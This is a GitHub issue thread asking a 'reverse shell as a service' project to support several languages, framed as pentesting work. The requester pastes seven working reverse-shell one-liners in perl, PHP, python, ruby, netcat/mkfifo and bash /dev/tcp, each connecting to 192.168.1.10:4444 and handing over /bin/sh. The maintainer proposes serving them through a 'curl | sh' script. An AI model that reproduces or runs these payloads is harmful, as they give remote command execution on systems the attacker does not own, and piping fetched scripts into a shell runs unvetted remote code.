### ISSUE TITLE
Multiple types of Reverse Shell oneliners

### ISSUE THREAD

**Issue by operatorequals** [lukechilds/reverse-shell#3]
Hello!

I really like your project, it is a lot more useful in pentesting than just a "prank".
So, as real usage of it emerges, new needs emerge too.

There are multiple ways to spawn a reverse shell. There are cases that `python` isn't installed somewhere, so your oneliner won't run and... **no shell**.

To dodge this, some years ago (when I was learning `bash` scripting), I created this project [oneliner-sh](https://github.com/operatorequals/oneliner-sh). This is a CLI tool that lists many oneliners for the tester to try. That includes `ruby`, `perl`, pure `bash`(without `netcat`), `powershell`, etc.

I'd be really happy if you included several oneliners in your *shell as a service*, and (while defaulting to `python`) made possible an argument - let's say `?type=ruby` - that would pick and return the modified version of the corresponding oneliner.

You will find many oneliner templates in the `templates/` folder of my project.

**Your project rocks!**

P.S. Including a `platform=(windows|linux)` parameter will probably be needed, for better fitting the oneliners into the real situation.

Sample output of the tool:
```bash
Inline Reverse Shells
Provides Greppable-Cuttable one liners with one keystroke!
version: 0.1 alpha

0#shell#perl#perl -MIO::Socket -e '$c=new IO::Socket::INET(PeerAddr => "192.168.1.10:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'#
1#shell#php#<?php $sock=fsockopen("192.168.1.10",4444);exec("/bin/sh <&3 >&3 2>&3"); ?>#
2#shell#python#python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call("/bin/sh",shell=True);'#
3#shell#ruby#ruby -rsocket -e 'c=TCPSocket.new("192.168.1.10","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'#
4#shell#shell_script#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh 2>&1|nc 192.168.1.10 4444 >/tmp/f#
5#shell#shell_script#exec 5<>/dev/tcp/192.168.1.10/4444;cat <&5 | while read line; do $line 2>&5 >&5; done#
6#shell#shell_script#/bin/sh -i >& /dev/tcp/192.168.1.10/4444 0>&1#
```

**Comment by lukechilds** [comment]
Yeah I had actually considered this when building. Currently Python is fine for my use case and I'm pretty tied up on other project so don't really have the time to implement this myself. I would definitely accept a PR that adds this functionality though.

I think I nice solution would be running a shell script that checks for `python`/`perl`/`ruby` etc and then executes the necessary payload. So you just `curl | sh` and let the script worry about what's available.

**Comment by lukechilds** [comment]
Closed by #8 8
